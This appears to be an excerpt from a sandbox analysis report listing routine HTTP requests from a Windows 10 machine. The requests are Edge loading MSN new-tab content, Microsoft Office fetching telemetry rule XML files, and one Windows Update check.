            Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1733002729077&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=bfe7ebb6adf24f17bd5171beb183b3d8&activityId=bfe7ebb6adf24f17bd5171beb183b3d8&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1BB4809CB69848CA9FA43D546A2C6D92&MUID=2A00BA3058306B91366DAF7759986AB6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2A00BA3058306B91366DAF7759986AB6; _EDGE_S=F=1&SID=3DD5691DFF4E6D4327747C5AFE686C97; _EDGE_V=1; SM=T
            Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=2A00BA3058306B91366DAF7759986AB6&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=8810299700620392370&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=8afbba3ef6ac427ca021d2ec93f6da32 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=2A00BA3058306B91366DAF7759986AB6; _EDGE_S=F=1&SID=3DD5691DFF4E6D4327747C5AFE686C97; _EDGE_V=1; _C_ETH=1; msnup=
            Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyO5.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msG0W.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=YDsEo1WlfzddsTn&MD=WvWXA6YO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
            Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
